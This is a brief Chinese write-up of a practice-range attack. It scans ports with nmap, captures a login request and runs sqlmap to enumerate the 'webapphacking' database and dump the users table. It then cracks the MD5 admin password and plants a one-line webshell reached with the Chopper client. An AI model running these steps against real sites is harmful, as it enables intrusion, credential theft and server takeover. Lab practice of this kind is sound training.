用nmap扫描端口
进入靶场后在首页注册登录
登录后进行抓包
复制下来保存为txt文档,使用sqlmap进行注入
查数据库(这里是在桌面打开的终端,因为txt文档我是建在桌面的)
sqlmap -r \3.txt --current-db
查表
sqlmap -r \3.txt -D webapphacking --tables
查数据
sqlmap -r \3.txt -D webapphacking -T users --dump
使用管理员密码登录,(这里的密码是md5加密的,所以需要我们进行md5解密)
登录成功后我们写一个一句话木马上去
上传成功后用菜刀进行连接
